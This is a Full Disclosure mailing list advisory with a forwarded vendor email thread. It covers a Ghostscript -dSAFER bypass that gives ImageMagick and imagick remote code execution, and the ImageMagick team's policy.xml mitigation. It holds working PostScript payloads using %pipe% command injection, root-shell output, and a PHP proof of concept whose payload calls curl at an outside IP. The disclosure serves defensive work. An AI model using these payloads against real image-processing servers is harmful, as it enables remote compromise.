[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Ghostscript sadbox bypass lead ImageMagick to remote code execution



recently I noticed Tavis Ormandy reporting a vulnerability about Ghostscript
-dSAFER mode could be ignored and lead to code execution, however no one
 exploit it in a application. there is a simple discussion and exploit
about it.



Author: redrain, yu.hong AT chaitin.com
Date: 2016-10-17
Version: Ghostscript version > 1.6
              ImageMagick(or other app) all version
Vendor Notified: 2016-10-18

ImageMagick allows to process files with external libraries (delegate). And
there are some delegate:

<delegate decode="eps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
&quot;-sDEVICE=pdfwrite&quot; &quot;-sOutputFile=%o&quot;
&quot;-f%i&quot;"/>
<delegate decode="eps" encode="ps" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=ps2write&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="eps" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=epswrite&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
  <delegate decode="ps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pdfwrite&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>

all of these delegate have use the Ghostscript(gs) to handle "pdf to eps"
"ps to eps" "eps to ps" "pdf to ps", and all delegates have use a parameter
-f, this parameter can lead ghostscript to exec any command.

Ghostscript version: > 9.16
for example, the lastest ubuntu 16.10 ghostscript package version is 9.19,
any user use imagemagick in this system is vulnerable.

cat rr.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit

convert rr.pdf eps:rr
root@redrain-Parallels-Virtual-Platform:/tmp# convert rr.pdf eps:rr
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
convert: no images defined `eps:rr' @
error/convert.c/ConvertImageCommand/3253.

And there is a interesting thing, Imagemagick will auto recognize the file
real format with the file header. and use correspond delegate to handle.

It also affects imagick.

PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}

$exploit = <<<EOF
%!PS

currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)

.putdeviceparams

quit
EOF;

$thumb = new Imagick();
$thumb->readImageBlob($exploit);

Regards,
redrain



---------- Forwarded message ----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-19 1:47 GMT+08:00
Subject: Fwd: Security Issue
To: chris.liddell AT artifex.com


Hi chris,
there is a vulnerability about Ghostscript, imagemagick security team
suggest me to post to your group

Regards,
redrain



Forwarded conversation
Subject: Re: Security Issue
------------------------

From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 19:16 GMT+08:00
To: rootredrain AT gmail.com


We've seen this Ghostscript issue before and it was rerouted to the
Ghostscript
maintainers.  And it looks like the flaw in Ghostscript might be fixed.
We're using Ghostcript 9.20 and we get:

'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ'
  ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
> /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ' -c
showpage
  ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
> /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCo
mmand/3253.


Until Ghostscript is upgraded under Ubuntu with the Ghostscript security
patch,
you can add a security policy to ImageMagick's policy.xml to prevent
Postscript / PDF from being rendered:

  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />

Now we get

convert -verbose rr.pdf eps:rr
convert: not authorized `rr.pdf' @ error/constitute.c/ReadImage/416.
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCo
mmand/3253.

The ImageMagick Security Team

----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 19:41 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


[image: 内嵌图片 1]

root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64  -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
 -sDEVICE=pdfwrite   -sOutputFile=1.eps   -f /var/www/html/1.pdf
uid=0(root) gid=0(root) groups=0(root)
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
profile failed
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
--version
9.20
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#


Regards,
redrain



----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 19:45 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


I guess u used the old gs version.?
and this vulnerability affected version >9.16

Regards,
redrain



2016-10-18 19:16 GMT+08:00 <vir.prudens.non.contra.ventum
.mingit AT imagemagick.org>:


----------
From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 19:50 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org,
rootredrain AT gmail.com


redrain root <rootredrain AT gmail.com> wrote:

> I guess u used the old gs version.?
> and this vulnerability affected version >9.16

We're using Ghostscript 9.20 which is > 9.16.

----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 20:11 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


u can use

tar zxf a.tar.gz
cd sb
./a.sh

then the command  returns "uid=0(root) gid=0(root) groups=0(root)"
Regards,
redrain



----------
From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 21:08 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org,
rootredrain AT gmail.com


redrain root <rootredrain AT gmail.com> wrote:

> [image: ???????????? 1]
>
> root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64  -q
> -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
>  -sDEVICE=pdfwrite   -sOutputFile=1.eps   -f /var/www/html/1.pdf
> uid=0(root) gid=0(root) groups=0(root)
> + ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
> profile failed
> root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
> --version
> 9.20
> root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#
>

Its likely the patch was against Ghostscript in Fedora 25.  As mentioned,
in the mean time add a security policy to ImageMagick to prevent the use
of Ghostscript.

----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 21:19 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


the lastest ghostscript is downloaded in http://www.ghostscript.com/
download/gsdnld.html and i'm trying to reproduce this vuln in different
distros, it works.

so do u consider this is a valid
<http://www.baidu.com/link?url=vaDUociPg8LBZyXflgyuNcr3M9njzrr-uFePUKarXS82DjxvGsJ_TeeeXLEBaOpoGIq1Vs7ZZALVaZ6Xu4YxM5H6-FgBiXtjhccxpZs6iXe>
vulnerability?
and another interesting thing is i try to exploit it in imagick, looks work
well

PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = <<<EOF
%!PS

currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)

.putdeviceparams

quit
EOF;

$thumb = new Imagick();
$thumb->readImageBlob($exploit);

Regards,
redrain



----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 21:38 GMT+08:00
To: 332746458 AT qq.com



Regards,
redrain



----------
From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 22:21 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org,
rootredrain AT gmail.com


redrain root <rootredrain AT gmail.com> wrote:

> the lastest ghostscript is downloaded in
> http://www.ghostscript.com/download/gsdnld.html and i'm trying to
reproduce

This appears to be a Ghostscript vulnerability.  Post to the Ghostscript
developers group.  We can't fix a Ghostscript vulnerability and our only
suggestion is an ImageMagick security policy that prevents the use of
Ghostscript until the vulnerability is fixed in Ghostscript.

PNG image

Attachment: a.tar.gz
Description: GNU Zip compressed data

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/